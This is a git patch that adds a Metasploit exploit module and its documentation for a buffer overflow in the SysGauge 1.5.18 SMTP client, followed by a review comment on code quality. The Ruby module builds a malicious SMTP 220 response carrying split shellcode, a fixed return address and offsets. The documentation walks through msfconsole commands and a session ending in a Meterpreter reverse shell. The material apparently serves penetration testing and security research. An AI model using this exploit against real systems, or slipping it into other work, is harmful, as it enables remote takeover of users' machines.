From cc4f18e6c5c2078aa9594372f555290ca98636c8 Mon Sep 17 00:00:00 2001
From: Chris Higgins
Date: Tue, 14 Mar 2017 23:29:19 -0500
Subject: [PATCH] Add sysgauge_client_bof module and documentation
---
 .../windows/smtp/sysgauge_client_bof.md | 39 +++++++++
 .../windows/smtp/sysgauge_client_bof.rb | 87 +++++++++++++++++++
 2 files changed, 126 insertions(+)
 create mode 100644 documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
 create mode 100644 modules/exploits/windows/smtp/sysgauge_client_bof.rb
diff --git a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
new file mode 100644
index 0000000000..af33a08a3a
--- /dev/null
+++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
@@ -0,0 +1,39 @@
+## Vulnerable Application
+
+ This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+via its SMTP server validation. The module sends a malicious response along in the
+220 service ready response and exploits the client resulting in an unpriviledged shell.
+
+## Verification Steps
+
+ 1. Install the application
+ 2. Start msfconsole
+ 3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
+ 4. Do: ```set payload windows/meterpreter/reverse_tcp```
+ 5. Do: ```set LHOST ip```
+ 6. Do: ```run```
+ 7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
+in the program, and hit the "Verify Email ..." button.
+ 8. You should get a shell.
+
+## Scenarios
+
+ Here is how to typically execute the module. Note that the client must input this SMTP server
+ information under SysGauge Options and hit the "Verify Email ..." button.
+
+ ```
+ msf > use exploit/windows/smtp/sysgauge_client_bof
+ msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
+ payload => windows/meterpreter/reverse_tcp
+ msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
+ lhost => 10.0.0.1
+ msf exploit(sysgauge_client_bof) > exploit
+ [*] Exploit running as background job.
+ msf exploit(sysgauge_client_bof) >
+ [*] Started reverse TCP handler on 10.0.0.1:4444
+ [*] Server started.
+ [*] Client connected: 10.0.0.128
+ [*] Sending payload...
+ [*] Sending stage (957487 bytes) to 10.0.0.128
+ [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500
+ ```
diff --git a/modules/exploits/windows/smtp/sysgauge_client_bof.rb b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
new file mode 100644
index 0000000000..61add663c9
--- /dev/null
+++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# Fuzzer written by corelanc0d3r -
+# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
+#
+##
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Msf::Exploit::Remote::TcpServer
+
+ def initialize()
+ super(
+ 'Name' => 'SysGauge SMTP Validation Buffer Overflow',
+ 'Description' => %q{
+ This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+ via its SMTP server validation. The module sends a malicious response along in the
+ 220 service ready response and exploits the client resulting in an unpriviledged shell.
+ },
+ 'Author' =>
+ [
+ 'Chris Higgins', # msf Module -- @ch1gg1ns
+ 'Peter Baris'
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'EDB', '41479' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 306,
+ 'Smallest' => true,
+ 'BadChars' => "\x00\x0a\x0d\x20"
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows Universal',
+ {
+ 'Offset' => 176,
+ 'Ret' => 0x6527635E # call esp # QtGui4.dll
+ }
+ ]
+ ],
+ 'Privileged' => 'false',
+ 'DisclosureDate' => 'Feb 28 2017',
+ 'DefaultTarget' => 0
+ )
+ register_options(
+ [
+ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
+ ], self.class)
+ end
+
+ def setup
+ super
+ end
+
+ def on_client_connect(c)
+ sploit = "220 "
+ sploit += rand_text(target['Offset'])
+ # Can only use the last part starting from 232 bytes in
+ sploit += payload.encoded[232..-1]
+ sploit += rand_text(2)
+ sploit += [target.ret].pack('V')
+ sploit += rand_text(12)
+ sploit += make_nops(8)
+ # And the first part up to 232 bytes
+ sploit += payload.encoded[0..231]
+ sploit += "ESMTP Sendmail \r\n"
+
+ print_status("Client connected: " + c.peerhost)
+ print_status("Sending payload...")
+
+ c.put(sploit)
+ end
+
+end
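Review bot: `'Privileged' => 'false'` in the module info hash is a string literal, and every string is truthy in Ruby, so the framework will record this module as yielding a privileged session even though the Description says the resulting shell is unprivileged; it should be the boolean `'Privileged' => false`. The Description string here and the .md text in the first hunk both spell "unpriviledged"; the correct spelling is "unprivileged". The header comment crediting a corelanc0d3r FTP-client fuzzer looks like a leftover from whichever module served as the template and does not describe this SMTP module, so it is worth removing or replacing with the actual origin of the technique. `def setup; super; end` changes nothing and can be dropped, and `print_status("Client connected: " + c.peerhost)` reads more idiomatically as `print_status("Client connected: #{c.peerhost}")`.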